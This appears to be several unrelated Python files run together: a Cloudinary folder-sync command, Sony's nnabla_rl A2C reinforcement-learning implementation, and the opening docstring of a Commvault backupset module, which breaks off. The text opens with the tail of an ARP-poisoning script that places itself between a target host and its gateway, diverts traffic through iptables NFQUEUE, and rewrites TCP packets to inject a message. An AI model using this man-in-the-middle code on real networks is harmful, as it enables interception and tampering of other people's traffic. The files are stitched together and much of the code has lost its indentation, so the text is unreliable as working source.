send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip))
send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip))
time.sleep(2)
except KeyboardInterrupt:
print("[*] Oprim atacul de ARP Poison. Restabilim reteaua...")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
def alter_packet(packet):
    '''Implement this as an exercise.
    Note: the len and checksum fields must be recalculated.
    '''
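    # Note: the rebuilt packets below deliberately omit the IP 'len' and the
    # IP/TCP 'chksum' fields; when these are left unset, scapy recomputes them
    # when the packet is built (show2()/send()), which is how the recalculation
    # warned about above is handled here.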
global seq_nr_mask, seq_nr_unmask
new_seq_nr = packet[TCP].seq
if new_seq_nr in seq_nr_mask:
new_seq_nr = seq_nr_mask[new_seq_nr]
new_ack_nr = packet[TCP].ack
if new_ack_nr in seq_nr_unmask:
new_ack_nr = seq_nr_unmask[new_ack_nr]
if packet.haslayer(Raw):
current_len = len(packet[Raw].load)
total_len = current_len + len(HACK_MESSAGE)
seq_nr_mask[packet[TCP].seq + current_len] = new_seq_nr + total_len
seq_nr_unmask[new_seq_nr + total_len] = packet[TCP].seq + current_len
new_packet = IP(
src = packet[IP].src,
dst = packet[IP].dst
) / TCP (
seq = new_seq_nr,
ack = new_ack_nr,
sport = packet[TCP].sport,
dport = packet[TCP].dport,
flags = packet[TCP].flags
) / (HACK_MESSAGE + packet[Raw].load)
        print('Packet after:')
new_packet.show2()
send(new_packet)
return
new_packet = IP(
src = packet[IP].src,
dst = packet[IP].dst
) / TCP (
seq = new_seq_nr,
ack = new_ack_nr,
sport = packet[TCP].sport,
dport = packet[TCP].dport,
flags = packet[TCP].flags
)
    print('Packet after:')
new_packet.show2()
send(new_packet)
return
def process(packet):
octeti = packet.get_payload()
scapy_packet = IP(octeti)
if not scapy_packet.haslayer(TCP):
packet.accept()
return
print("Pachet initial:")
scapy_packet.show2()
alter_packet(scapy_packet)
if __name__ == '__main__':
print("[*] Porneste script-ul...")
print(f"[*] Gateway IP address: {gateway_ip}")
print(f"[*] Target IP address: {target_ip}")
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print("[!] Nu putem afla adresa MAC a gateway. Inchidem...")
sys.exit(0)
else:
print(f"[*] Gateway MAC address: {gateway_mac}")
target_mac = get_mac(target_ip)
if target_mac is None:
print("[!] Nu putem afla adresa MAC a target. Inchidem...")
sys.exit(0)
else:
print(f"[*] Target MAC address: {target_mac}")
    # Start a separate thread that handles interposing between the target and the gateway
poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
queue = NFQ()
    # Capture the packets passing through our network interface and run them through the NFQUEUE handler.
try:
sniff_filter = "ip host " + target_ip
print(f"[*] Pornim captarea pachetelor pe placa de retea. Packet Count: {packet_count}. Filter: {sniff_filter}")
print(f"[*] Stopping network capture..Restoring network")
os.system("iptables -I INPUT -j NFQUEUE --queue-num 5")
os.system("iptables -I OUTPUT -j NFQUEUE --queue-num 5")
os.system("iptables -I FORWARD -j NFQUEUE --queue-num 5")
queue.bind(5, process)
queue.run()
os.system('iptables -D FORWARD 1')
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
print(f"[*] Oprim captarea pachetelor. Restabilim reteaua...")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
os.system('iptables -D FORWARD 1')
queue.unbind()
sys.exit(0)
|
sync.py
|
from click import command, argument, option
from cloudinary import uploader as _uploader, api, Search
from cloudinary.utils import cloudinary_url as cld_url
from os import walk, sep, remove, rmdir, listdir, mkdir
from os.path import splitext, split, join as path_join, abspath, isdir
from requests import get
from hashlib import md5
from itertools import product
from functools import reduce
from threading import Thread, active_count
from time import sleep
from ..utils import log, F_OK, F_WARN, F_FAIL
@command("sync",
short_help="Synchronize between a local directory and a Cloudinary folder",
help="Synchronize between a local directory and a Cloudinary folder while preserving directory structure")
@argument("local_folder")
@argument("cloudinary_folder")
@option("--push", help="Push will sync the local directory to the Cloudinary directory", is_flag=True)
@option("--pull", help="Pull will sync the Cloudinary directory to the local directory", is_flag=True)
@option("-v", "--verbose", is_flag=True, help="Logs information after each upload")
@option("--expression", help="Search expression used to limit sync")
def sync(local_folder, cloudinary_folder, push, pull, verbose, expression):
if push == pull:
print("Please use either the '--push' OR '--pull' options")
exit(1)
etag = lambda f: md5(open(f, 'rb').read()).hexdigest()
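    # Sync decisions below compare this local MD5 digest against the 'etag' that
    # Cloudinary returns in the image_analysis search field, so files are only
    # re-uploaded or re-downloaded when their content actually differs.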
def walk_dir(folder):
all_files = {}
for root, _, files in walk(folder):
for _file in files:
all_files[splitext(path_join(root, _file)[len(folder) + 1:])[0]] = {
"etag": etag(path_join(root, _file)), "path": path_join(root, _file)}
return all_files
def query_cld_folder(folder):
next_cursor = None
items = {}
while True:
search_expr = "{}/*".format(folder)
if expression:
search_expr = "{0} AND {1}".format(search_expr, expression)
res = Search().expression(search_expr).next_cursor(next_cursor).with_field(
"image_analysis").max_results(500).execute()
for item in res['resources']:
items[item['public_id'][len(folder) + 1:]] = {"etag": item['image_analysis']['etag'],
"resource_type": item['resource_type'],
"public_id": item['public_id'], "type": item['type'],
"format": item['format']}
if 'next_cursor' not in res.keys():
break
else:
next_cursor = res['next_cursor']
return items
files = walk_dir(abspath(local_folder))
print("Found {} items in local folder '{}'".format(len(files.keys()), local_folder))
cld_files = query_cld_folder(cloudinary_folder)
print("Found {} items in Cloudinary folder '{}'".format(len(cld_files.keys()), cloudinary_folder))
files_ = set(files.keys())
cld_files_ = set(cld_files.keys())
files_in_cloudinary_nin_local = cld_files_ - files_
files_in_local_nin_cloudinary = files_ - cld_files_
skipping = 0
if push:
files_to_delete_from_cloudinary = list(cld_files_ - files_)
files_to_push = files_ - cld_files_
files_to_check = files_ - files_to_push
print("\nCalculating differences...\n")
for f in files_to_check:
if files[f]['etag'] == cld_files[f]['etag']:
if verbose:
print(F_WARN("{} already exists in Cloudinary".format(f)))
skipping += 1
else:
files_to_push.add(f)
print("Skipping upload for {} items".format(skipping))
if len(files_to_delete_from_cloudinary) > 0:
print("Deleting {} resources from Cloudinary folder '{}'".format(len(files_to_delete_from_cloudinary),
cloudinary_folder))
files_to_delete_from_cloudinary = list(map(lambda x: cld_files[x], files_to_delete_from_cloudinary))
for i in product({"upload", "private", "authenticated"}, {"image", "video", "raw"}):
batch = list(map(lambda x: x['public_id'],
filter(lambda x: x["type"] == i[0] and x["resource_type"] == i[1],
files_to_delete_from_cloudinary)))
if len(batch) > 0:
print("Deleting {} resources with type '{}' and resource_type '{}'".format(len(batch), *i))
counter = 0
while counter * 100 < len(batch) and len(batch) > 0:
counter += 1
res = api.delete_resources(batch[(counter - 1) * 100:counter * 100], invalidate=True,
resource_type=i[1], type=i[0])
num_deleted = reduce(lambda x, y: x + 1 if y == "deleted" else x, res['deleted'].values(), 0)
if verbose:
log(res)
if num_deleted != len(batch):
print(F_FAIL("Failed deletes:\n{}".format("\n".join(list(
map(lambda x: x[0], filter(lambda x: x[1] != 'deleted', res['deleted'].items())))))))
else:
print(F_OK("Deleted {} resources".format(num_deleted)))
to_upload = list(filter(lambda x: split(x)[1][0] != ".", files_to_push))
print("Uploading {} items to Cloudinary folder '{}'".format(len(to_upload), cloudinary_folder))
threads = []
def threaded_upload(options, path, verbose):
res = _uploader.upload(path, **options)
if verbose:
print(F_OK("Uploaded '{}'".format(res['public_id'])))
for i in to_upload:
modif_folder = path_join(cloudinary_folder, sep.join(i.split(sep)[:-1]))
options = {'use_filename': True, 'unique_filename': False, 'folder': modif_folder, 'invalidate': True,
'resource_type': 'auto'}
threads.append(Thread(target=threaded_upload, args=(options, files[i]['path'], verbose)))
for t in threads:
while active_count() >= 30:
# prevent concurrency overload
sleep(1)
t.start()
sleep(1 / 10)
[t.join() for t in threads]
print("Done!")
else:
files_to_delete_local = list(files_in_local_nin_cloudinary)
files_to_pull = files_in_cloudinary_nin_local
files_to_check = cld_files_ - files_to_pull
print("\nCalculating differences...\n")
for f in files_to_check:
if files[f]['etag'] == cld_files[f]['etag']:
if verbose:
print(F_WARN("{} already exists locally".format(f)))
skipping += 1
else:
files_to_pull.add(f)
print("Skipping download for {} items".format(skipping))
def delete_empty_folders(root, verbose, remove_root=False):
if not isdir(root):
return
files = listdir(root)
if len(files):
for f in files:
fullpath = path_join(root, f)
if isdir(fullpath):
delete_empty_folders(fullpath, verbose, True)
files = listdir(root)
if len(files) == 0 and remove_root:
if verbose:
print("Removing empty folder '{}'".format(root))
rmdir(root)
def create_required_directories(root, verbose):
if isdir(root):
return
else:
create_required_directories(sep.join(root.split(sep)[:-1]), verbose)
if verbose:
print("Creating directory '{}'".format(root))
mkdir(root)
print("Deleting {} local files...".format(len(files_to_delete_local)))
for i in files_to_delete_local:
remove(abspath(files[i]['path']))
if verbose:
print("Deleted '{}'".format(abspath(files[i]['path'])))
print("Deleting empty folders...")
delete_empty_folders(local_folder, verbose)
print("Downloading {} files from Cloudinary".format(len(files_to_pull)))
threads = []
        def threaded_pull(item, local_path, verbose, cld_files):
            with open(local_path, "wb") as f:
                to_download = cld_files[item]
                r = get(cld_url(to_download['public_id'], resource_type=to_download['resource_type'],
                                type=to_download['type'])[0])
                f.write(r.content)
            if verbose:
                print(F_OK("Downloaded '{}' to '{}'".format(item, local_path)))
for i in files_to_pull:
local_path = abspath(path_join(local_folder,
i + "." + cld_files[i]['format']
if cld_files[i]['resource_type'] != 'raw' else i))
create_required_directories(split(local_path)[0], verbose)
            threads.append(Thread(target=threaded_pull, args=(i, local_path, verbose, cld_files)))
for t in threads:
while active_count() >= 30:
# prevent concurrency overload
sleep(1)
t.start()
sleep(1 / 10)
[t.join() for t in threads]
print("Done!")
|
a2c.py
|
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing as mp
import os
from collections import namedtuple
from dataclasses import dataclass
from typing import Any, Dict, List, Optional
import gym
import numpy as np
import nnabla as nn
import nnabla_rl.model_trainers as MT
import nnabla_rl.utils.context as context
from nnabla import solvers as NS
from nnabla_rl import environment_explorers as EE
from nnabla_rl.algorithm import Algorithm, AlgorithmConfig, eval_api
from nnabla_rl.builders import ModelBuilder, SolverBuilder
from nnabla_rl.environments.environment_info import EnvironmentInfo
from nnabla_rl.model_trainers.model_trainer import ModelTrainer, TrainingBatch
from nnabla_rl.models import A3CPolicy, A3CSharedFunctionHead, A3CVFunction, StochasticPolicy, VFunction
from nnabla_rl.utils.data import add_batch_dimension, marshal_experiences, set_data_to_variable, unzip
from nnabla_rl.utils.misc import create_variable
from nnabla_rl.utils.multiprocess import (copy_mp_arrays_to_params, copy_params_to_mp_arrays, mp_array_from_np_array,
mp_to_np_array, new_mp_arrays_from_params, np_to_mp_array)
from nnabla_rl.utils.reproductions import set_global_seed
@dataclass
class A2CConfig(AlgorithmConfig):
"""
List of configurations for A2C algorithm
Args:
gamma (float): discount factor of rewards. Defaults to 0.99.
n_steps (int): number of rollout steps. Defaults to 5.
learning_rate (float): learning rate which is set to all solvers. \
You can customize/override the learning rate for each solver by implementing the \
(:py:class:`SolverBuilder <nnabla_rl.builders.SolverBuilder>`) by yourself. \
Defaults to 0.0007.
entropy_coefficient (float): scalar of entropy regularization term. Defaults to 0.01.
value_coefficient (float): scalar of value loss. Defaults to 0.5.
        decay (float): decay parameter of the RMSprop solver. Defaults to 0.99.
        epsilon (float): epsilon of the RMSprop solver. Defaults to 0.00001.
start_timesteps (int): the timestep when training starts.\
The algorithm will collect experiences from the environment by acting randomly until this timestep.
Defaults to 1.
actor_num (int): number of parallel actors. Defaults to 8.
timelimit_as_terminal (bool): Treat as done if the environment reaches the \
`timelimit <https://github.com/openai/gym/blob/master/gym/wrappers/time_limit.py>`_.\
Defaults to False.
max_grad_norm (float): threshold value for clipping gradient. Defaults to 0.5.
seed (int): base seed of random number generator used by the actors. Defaults to 1.
        learning_rate_decay_iterations (int): learning rate will be decreased linearly to 0 until this iteration number.
            If 0 or negative, the learning rate will be kept fixed. Defaults to 50000000.
"""
gamma: float = 0.99
n_steps: int = 5
learning_rate: float = 7e-4
entropy_coefficient: float = 0.01
value_coefficient: float = 0.5
decay: float = 0.99
epsilon: float = 1e-5
start_timesteps: int = 1
actor_num: int = 8
timelimit_as_terminal: bool = False
max_grad_norm: Optional[float] = 0.5
seed: int = -1
learning_rate_decay_iterations: int = 50000000
def __post_init__(self):
'''__post_init__
Check the set values are in valid range.
'''
self._assert_between(self.gamma, 0.0, 1.0, 'gamma')
self._assert_between(self.decay, 0.0, 1.0, 'decay')
self._assert_positive(self.n_steps, 'n_steps')
self._assert_positive(self.actor_num, 'actor num')
self._assert_positive(self.learning_rate, 'learning_rate')
class DefaultPolicyBuilder(ModelBuilder[StochasticPolicy]):
def build_model(self, # type: ignore[override]
scope_name: str,
env_info: EnvironmentInfo,
algorithm_config: A2CConfig,
**kwargs) -> StochasticPolicy:
_shared_function_head = A3CSharedFunctionHead(scope_name="shared",
state_shape=env_info.state_shape)
return A3CPolicy(head=_shared_function_head,
scope_name="shared",
state_shape=env_info.state_shape,
action_dim=env_info.action_dim)
class DefaultVFunctionBuilder(ModelBuilder[VFunction]):
def build_model(self, # type: ignore[override]
scope_name: str,
env_info: EnvironmentInfo,
algorithm_config: A2CConfig,
**kwargs) -> VFunction:
_shared_function_head = A3CSharedFunctionHead(scope_name="shared",
state_shape=env_info.state_shape)
return A3CVFunction(head=_shared_function_head,
scope_name="shared",
state_shape=env_info.state_shape)
class DefaultSolverBuilder(SolverBuilder):
def build_solver(self, # type: ignore[override]
env_info: EnvironmentInfo,
algorithm_config: A2CConfig,
**kwargs) -> nn.solver.Solver:
return NS.RMSprop(lr=algorithm_config.learning_rate,
decay=algorithm_config.decay,
eps=algorithm_config.epsilon)
class A2C(Algorithm):
'''Advantage Actor-Critic (A2C) algorithm implementation.
This class implements the Advantage Actor-Critic (A2C) algorithm.
A2C is the synchronous version of A3C, Asynchronous Advantage Actor-Critic.
A3C was proposed by V. Mnih, et al. in the paper: "Asynchronous Methods for Deep Reinforcement Learning"
For detail see: https://arxiv.org/abs/1602.01783
This algorithm only supports online training.
Args:
env_or_env_info\
(gym.Env or :py:class:`EnvironmentInfo <nnabla_rl.environments.environment_info.EnvironmentInfo>`):
the environment to train or environment info
v_function_builder (:py:class:`ModelBuilder[VFunction] <nnabla_rl.builders.ModelBuilder>`):
builder of v function models
v_solver_builder (:py:class:`SolverBuilder <nnabla_rl.builders.SolverBuilder>`): builder for v function solvers
        policy_builder (:py:class:`ModelBuilder[StochasticPolicy] <nnabla_rl.builders.ModelBuilder>`):
builder of policy models
policy_solver_builder (:py:class:`SolverBuilder <nnabla_rl.builders.SolverBuilder>`): builder for policy solvers
config (:py:class:`A2CConfig <nnabla_rl.algorithms.a2c.A2CConfig>`): configuration of A2C algorithm
'''
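    # Hedged usage sketch (comment only; the environment name and the training entry
    # point are assumptions, not taken from this file):
    #   train_env = gym.make('CartPole-v1')                    # discrete-action env
    #   a2c = A2C(train_env, config=A2CConfig(actor_num=4, n_steps=5))
    #   a2c.train(train_env, total_iterations=100000)          # assumed Algorithm API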
# type declarations to type check with mypy
# NOTE: declared variables are instance variable and NOT class variable, unless it is marked with ClassVar
# See https://mypy.readthedocs.io/en/stable/class_basics.html for details
_config: A2CConfig
_v_function: VFunction
_v_function_solver: nn.solver.Solver
_policy: StochasticPolicy
_policy_solver: nn.solver.Solver
_actors: List['_A2CActor']
_actor_processes: List[mp.Process]
_eval_state_var: nn.Variable
_eval_action: nn.Variable
_s_current_var: nn.Variable
_a_current_var: nn.Variable
_returns_var: nn.Variable
_policy_trainer: ModelTrainer
_v_function_trainer: ModelTrainer
_policy_solver_builder: SolverBuilder
_v_solver_builder: SolverBuilder
_policy_trainer_state: Dict[str, Any]
_v_function_trainer_state: Dict[str, Any]
def __init__(self, env_or_env_info,
v_function_builder: ModelBuilder[VFunction] = DefaultVFunctionBuilder(),
v_solver_builder: SolverBuilder = DefaultSolverBuilder(),
policy_builder: ModelBuilder[StochasticPolicy] = DefaultPolicyBuilder(),
policy_solver_builder: SolverBuilder = DefaultSolverBuilder(),
config=A2CConfig()):
super(A2C, self).__init__(env_or_env_info, config=config)
# Initialize on cpu and change the context later
with nn.context_scope(context.get_nnabla_context(-1)):
self._policy = policy_builder('pi', self._env_info, self._config)
self._v_function = v_function_builder('v', self._env_info, self._config)
self._policy_solver = policy_solver_builder(self._env_info, self._config)
self._policy_solver_builder = policy_solver_builder # keep for later use
self._v_function_solver = v_solver_builder(self._env_info, self._config)
self._v_solver_builder = v_solver_builder # keep for later use
@eval_api
def compute_eval_action(self, state, *, begin_of_episode=False):
with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):
state = add_batch_dimension(state)
if not hasattr(self, '_eval_state_var'):
self._eval_state_var = create_variable(1, self._env_info.state_shape)
distribution = self._policy.pi(self._eval_state_var)
self._eval_action = distribution.sample()
self._eval_action.need_grad = False
set_data_to_variable(self._eval_state_var, state)
self._eval_action.forward(clear_no_need_grad=True)
action = np.squeeze(self._eval_action.d, axis=0)
if self._env_info.is_discrete_action_env():
                return int(action)
else:
return action
def _before_training_start(self, env_or_buffer):
if not self._is_env(env_or_buffer):
raise ValueError('A2C only supports online training')
env = env_or_buffer
# FIXME: This setup is a workaround for creating underlying model parameters
# If the parameter is not created, the multiprocessable array (created in launch_actor_processes)
# will be empty and the agent does not learn anything
context.set_nnabla_context(-1)
self._setup_policy_training(env)
self._setup_v_function_training(env)
self._actors, self._actor_processes = self._launch_actor_processes(env)
        # NOTE: Set the gpu context after the launch of the actor processes.
        # If the gpu context is set before the processes are launched, the processes will be corrupted.
context.set_nnabla_context(self._config.gpu_id)
# Setup again here to use gpu (if it is set)
old_policy_solver = self._policy_solver
self._policy_solver = self._policy_solver_builder(self._env_info, self._config)
self._policy_trainer = self._setup_policy_training(env)
self._policy_solver.set_states(old_policy_solver.get_states())
old_v_function_solver = self._v_function_solver
self._v_function_solver = self._v_solver_builder(self._env_info, self._config)
self._v_function_trainer = self._setup_v_function_training(env)
self._v_function_solver.set_states(old_v_function_solver.get_states())
def _setup_policy_training(self, env_or_buffer):
policy_trainer_config = MT.policy_trainers.A2CPolicyTrainerConfig(
entropy_coefficient=self._config.entropy_coefficient,
max_grad_norm=self._config.max_grad_norm
)
policy_trainer = MT.policy_trainers.A2CPolicyTrainer(
models=self._policy,
solvers={self._policy.scope_name: self._policy_solver},
env_info=self._env_info,
config=policy_trainer_config)
return policy_trainer
def _setup_v_function_training(self, env_or_buffer):
# training input/loss variables
v_function_trainer_config = MT.v_value.MonteCarloVTrainerConfig(
reduction_method='mean',
v_loss_scalar=self._config.value_coefficient,
max_grad_norm=self._config.max_grad_norm
)
v_function_trainer = MT.v_value.MonteCarloVTrainer(
train_functions=self._v_function,
solvers={self._v_function.scope_name: self._v_function_solver},
env_info=self._env_info,
config=v_function_trainer_config
)
return v_function_trainer
def _launch_actor_processes(self, env):
actors = self._build_a2c_actors(env, v_function=self._v_function, policy=self._policy)
processes = []
for actor in actors:
p = mp.Process(target=actor, daemon=True)
p.start()
processes.append(p)
return actors, processes
def _build_a2c_actors(self, env, v_function, policy):
actors = []
for i in range(self._config.actor_num):
actor = _A2CActor(actor_num=i,
env=env,
env_info=self._env_info,
v_function=v_function,
policy=policy,
config=self._config)
actors.append(actor)
return actors
def _after_training_finish(self, env_or_buffer):
for actor in self._actors:
actor.dispose()
for process in self._actor_processes:
self._kill_actor_processes(process)
def _kill_actor_processes(self, process):
process.terminate()
process.join()
def _run_online_training_iteration(self, env):
update_interval = self._config.n_steps * self._config.actor_num
if self.iteration_num % update_interval != 0:
return
experiences = self._collect_experiences(self._actors)
self._a2c_training(experiences)
def _run_offline_training_iteration(self, buffer):
raise NotImplementedError
def _collect_experiences(self, actors):
for actor in actors:
actor.update_v_params(self._v_function.get_parameters())
actor.update_policy_params(self._policy.get_parameters())
actor.run_data_collection()
results = [actor.wait_data_collection() for actor in actors]
return (np.concatenate(item, axis=0) for item in unzip(results))
def _a2c_training(self, experiences):
s, a, returns = experiences
advantage = self._compute_advantage(s, returns)
extra = {}
extra['advantage'] = advantage
extra['v_target'] = returns
batch = TrainingBatch(batch_size=len(a),
s_current=s,
a_current=a,
extra=extra)
# lr decay
alpha = self._config.learning_rate
if 0 < self._config.learning_rate_decay_iterations:
learning_rate_decay = max(1.0 - self._iteration_num / self._config.learning_rate_decay_iterations, 0.0)
alpha = alpha * learning_rate_decay
self._policy_trainer.set_learning_rate(alpha)
self._v_function_trainer.set_learning_rate(alpha)
# model update
self._policy_trainer_state = self._policy_trainer.train(batch)
self._v_function_trainer_state = self._v_function_trainer.train(batch)
def _compute_advantage(self, s, returns):
if not hasattr(self, '_state_var_for_advantage'):
self._state_var_for_advantage = nn.Variable(s.shape)
self._returns_var_for_advantage = nn.Variable(returns.shape)
v_for_advantage = self._v_function.v(self._state_var_for_advantage)
self._advantage = self._returns_var_for_advantage - v_for_advantage
self._advantage.need_grad = False
self._state_var_for_advantage.d = s
self._returns_var_for_advantage.d = returns
self._advantage.forward(clear_no_need_grad=True)
return self._advantage.d
def _models(self):
models = {}
models[self._policy.scope_name] = self._policy
models[self._v_function.scope_name] = self._v_function
return models
def _solvers(self):
solvers = {}
solvers[self._policy.scope_name] = self._policy_solver
solvers[self._v_function.scope_name] = self._v_function_solver
return solvers
@classmethod
def is_supported_env(cls, env_or_env_info):
env_info = EnvironmentInfo.from_env(env_or_env_info) if isinstance(env_or_env_info, gym.Env) \
else env_or_env_info
return not env_info.is_continuous_action_env()
@property
def latest_iteration_state(self):
latest_iteration_state = super(A2C, self).latest_iteration_state
if hasattr(self, '_policy_trainer_state'):
latest_iteration_state['scalar'].update({'pi_loss': float(self._policy_trainer_state['pi_loss'])})
if hasattr(self, '_v_function_trainer_state'):
latest_iteration_state['scalar'].update({'v_loss': float(self._v_function_trainer_state['v_loss'])})
return latest_iteration_state
class _A2CActor(object):
def __init__(self, actor_num, env, env_info, policy, v_function, config):
self._actor_num = actor_num
self._env = env
self._env_info = env_info
self._policy = policy
self._v_function = v_function
self._n_steps = config.n_steps
self._gamma = config.gamma
self._config = config
# IPC communication variables
self._disposed = mp.Value('i', False)
self._task_start_event = mp.Event()
self._task_finish_event = mp.Event()
self._policy_mp_arrays = new_mp_arrays_from_params(policy.get_parameters())
self._v_function_mp_arrays = new_mp_arrays_from_params(v_function.get_parameters())
explorer_config = EE.RawPolicyExplorerConfig(initial_step_num=0,
timelimit_as_terminal=self._config.timelimit_as_terminal)
self._environment_explorer = EE.RawPolicyExplorer(policy_action_selector=self._compute_action,
env_info=self._env_info,
config=explorer_config)
obs_space = self._env.observation_space
action_space = self._env.action_space
MultiProcessingArrays = namedtuple('MultiProcessingArrays', ['state', 'action', 'returns'])
state_mp_array_shape = (self._n_steps, *obs_space.shape)
state_mp_array = mp_array_from_np_array(
np.empty(shape=state_mp_array_shape, dtype=obs_space.dtype))
if env_info.is_discrete_action_env():
action_mp_array_shape = (self._n_steps, 1)
action_mp_array = mp_array_from_np_array(
np.empty(shape=action_mp_array_shape, dtype=action_space.dtype))
else:
action_mp_array_shape = (self._n_steps, action_space.shape[0])
action_mp_array = mp_array_from_np_array(
np.empty(shape=action_mp_array_shape, dtype=action_space.dtype))
scalar_mp_array_shape = (self._n_steps, 1)
returns_mp_array = mp_array_from_np_array(
np.empty(shape=scalar_mp_array_shape, dtype=np.float32))
self._mp_arrays = MultiProcessingArrays(
(state_mp_array, state_mp_array_shape, obs_space.dtype),
(action_mp_array, action_mp_array_shape, action_space.dtype),
(returns_mp_array, scalar_mp_array_shape, np.float32)
)
def __call__(self):
self._run_actor_loop()
def dispose(self):
self._disposed = True
self._task_start_event.set()
def run_data_collection(self):
self._task_finish_event.clear()
self._task_start_event.set()
def wait_data_collection(self):
self._task_finish_event.wait()
return (mp_to_np_array(mp_array, shape, dtype) for (mp_array, shape, dtype) in self._mp_arrays)
def update_v_params(self, params):
self._update_params(src=params, dest=self._v_function_mp_arrays)
def update_policy_params(self, params):
self._update_params(src=params, dest=self._policy_mp_arrays)
def _run_actor_loop(self):
context.set_nnabla_context(self._config.gpu_id)
if self._config.seed >= 0:
seed = self._actor_num + self._config.seed
else:
seed = os.getpid()
set_global_seed(seed)
self._env.seed(seed)
while (True):
self._task_start_event.wait()
if self._disposed.get_obj():
break
self._synchronize_policy_params(self._policy.get_parameters())
self._synchronize_v_function_params(self._v_function.get_parameters())
experiences = self._run_data_collection()
self._fill_result(experiences)
self._task_start_event.clear()
self._task_finish_event.set()
def _run_data_collection(self):
experiences = self._environment_explorer.step(self._env, n=self._n_steps, break_if_done=False)
s_last = experiences[-1][4]
experiences = [(s, a, r, non_terminal)
for (s, a, r, non_terminal, *_) in experiences]
processed_experiences = self._process_experiences(experiences, s_last)
return processed_experiences
def _process_experiences(self, experiences, s_last):
(s, a, r, non_terminal) = marshal_experiences(experiences)
v_last = self._compute_v(s_last)
returns = self._compute_returns(r, non_terminal, v_last)
return (s, a, returns)
def _compute_returns(self, rewards, non_terminals, value_last):
returns = []
R = value_last
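        # Worked example (illustrative): with gamma = 0.99, rewards [r0, r1, r2],
        # all steps non-terminal and bootstrap value v = V(s_last), the backward
        # recursion below yields R2 = r2 + 0.99*v, R1 = r1 + 0.99*R2 and
        # R0 = r0 + 0.99*R1, i.e. n-step discounted returns bootstrapped from the critic.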
for i, (r, non_terminal) in enumerate(zip(rewards[::-1], non_terminals[::-1])):
R = r + self._gamma * R * non_terminal
returns.insert(0, [R])
return np.array(returns)
def _compute_v(self, s):
s = np.expand_dims(s, axis=0)
if not hasattr(self, '_state_var'):
self._state_var = nn.Variable(s.shape)
self._v_var = self._v_function.v(self._state_var)
self._v_var.need_grad = False
self._state_var.d = s
self._v_var.forward(clear_no_need_grad=True)
v = self._v_var.d.copy()
return v
def _fill_result(self, experiences):
def array_and_dtype(mp_arrays_item):
return mp_arrays_item[0], mp_arrays_item[2]
(s, a, returns) = experiences
np_to_mp_array(s, *array_and_dtype(self._mp_arrays.state))
np_to_mp_array(a, *array_and_dtype(self._mp_arrays.action))
np_to_mp_array(returns, *array_and_dtype(self._mp_arrays.returns))
@eval_api
def _compute_action(self, s, *, begin_of_episode=False):
s = np.expand_dims(s, axis=0)
if not hasattr(self, '_eval_state_var'):
self._eval_state_var = nn.Variable(s.shape)
distribution = self._policy.pi(self._eval_state_var)
self._eval_action = distribution.sample()
self._eval_state_var.need_grad = False
self._eval_action.need_grad = False
self._eval_state_var.d = s
self._eval_action.forward(clear_no_need_grad=True)
action = np.squeeze(self._eval_action.d, axis=0)
if self._env_info.is_discrete_action_env():
            return int(action), {}
else:
return action, {}
def _update_params(self, src, dest):
copy_params_to_mp_arrays(src, dest)
def _synchronize_policy_params(self, params):
self._synchronize_params(src=self._policy_mp_arrays, dest=params)
def _synchronize_v_function_params(self, params):
self._synchronize_params(src=self._v_function_mp_arrays, dest=params)
def _synchronize_params(self, src, dest):
copy_mp_arrays_to_params(src, dest)
|
backupset.py
|
# -*- coding: utf-8 -*-
# --------------------------------------------------------------------------
# Copyright Commvault Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""Main file for performing backup set operations.
Backupsets and Backupset are 2 classes defined in this file.
Backupsets: Class for representing all the backup sets associated with a specific agent
Backupset: Class for a single backup set selected for an agent,
and to perform operations on that backup set
Backupsets:
===========
__init__(class_object) -- initialise object of Backupsets class associated with
the specified agent/instance
__str__() -- returns all the backupsets associated with the agent
__repr__() -- returns the string for the instance of the Backupsets class
__len__() -- returns the number of backupsets associated with the Agent
__getitem__() -- returns the name of the backupset for the given backupset Id
or the details for the given backupset name
_get_backupsets() -- gets all the backupsets associated with the agent specified
default_backup_set() -- returns the name of the default backup set
all_backupsets() -- returns the dict of all the backupsets for the Agent /
Instance of the selected Client
has_backupset(backupset_name) -- checks if a backupset exists with the given name or not
_process_add_response() -- to process the add backupset request using API call
add(backupset_name) -- adds a new backupset to the agent of the specified client
add_archiveset(archiveset_name) -- adds a new archiveset to the agent of the specified client
add_salesforce_backupset() -- adds a new salesforce backupset
get(backupset_name) -- returns the Backupset class object
of the input backup set name
delete(backupset_name) -- removes the backupset from the agent of the specified client
refresh() -- refresh the backupsets associated with the agent
Backupset:
==========
__init__() -- initialise object of Backupset with the specified backupset
name and id, and associated to the specified instance
__getattr__() -- provides access to restore helper methods
__repr__() -- return the backupset name, the instance is associated with
_get_backupset_id() -- method to get the backupset id, if not specified in __init__
_get_backupset_properties() -- get the properties of this backupset
_run_backup() -- runs full backup for the specified subclient,
and appends the job object to the return list
_update() -- updates the properties of the backupset
_get_epoch_time() -- gets the Epoch time given the input time is in format
%Y-%m-%d %H:%M:%S
_set_defaults() -- recursively sets default values on a dictionary
_prepare_browse_options() -- prepares the options for the Browse/find operation
_prepare_browse_json() -- prepares the JSON object for the browse request
_process_browse_response() -- retrieves the items from browse response
_process_update_request() -- to process the request using API call
